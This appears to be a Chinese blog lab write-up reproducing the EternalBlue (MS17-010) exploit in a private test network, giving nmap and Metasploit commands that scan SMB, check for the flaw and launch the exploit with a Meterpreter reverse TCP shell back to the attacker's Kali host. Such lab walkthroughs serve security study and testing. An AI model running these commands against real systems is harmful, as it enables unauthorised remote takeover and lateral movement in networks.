永恒之蓝MS17-010漏洞复现

(Updated: )
Windows
,

作为内网横向渗透/HW刷分漏洞,还是值得看下。

环境

victim:windows 2008 r2 - 192.168.116.148

attack:kali2020 - 192.168.116.11

步骤:

先用nmap扫描目标是否开启smb服务

1
sudo  nmap -T4 -sS -Pn -sV -p445 192.168.116.148

image-20201118201450681

确认开启了445端口,可以尝试进行下一步

先在msf查找永恒之蓝相关的模块:

1
search ms17-010

image-20201118201758536

发现扫描可用模块:auxiliary/scanner/smb/smb_ms17_010,漏洞利用:exploit/windows/smb/ms17_010_eternalblue

先扫描是否存在漏洞,设置目标信息

1
2
3
4
use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.116.148
show options
run

image-20201118202211667

发现可能存在漏洞,进一步尝试攻击。选择ms17_010_eternalblue模块,设置payload

1
2
3
4
5
6
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.116.148
set lhost 192.168.116.11
show options
run

image-20201118203321080

image-20201118203447261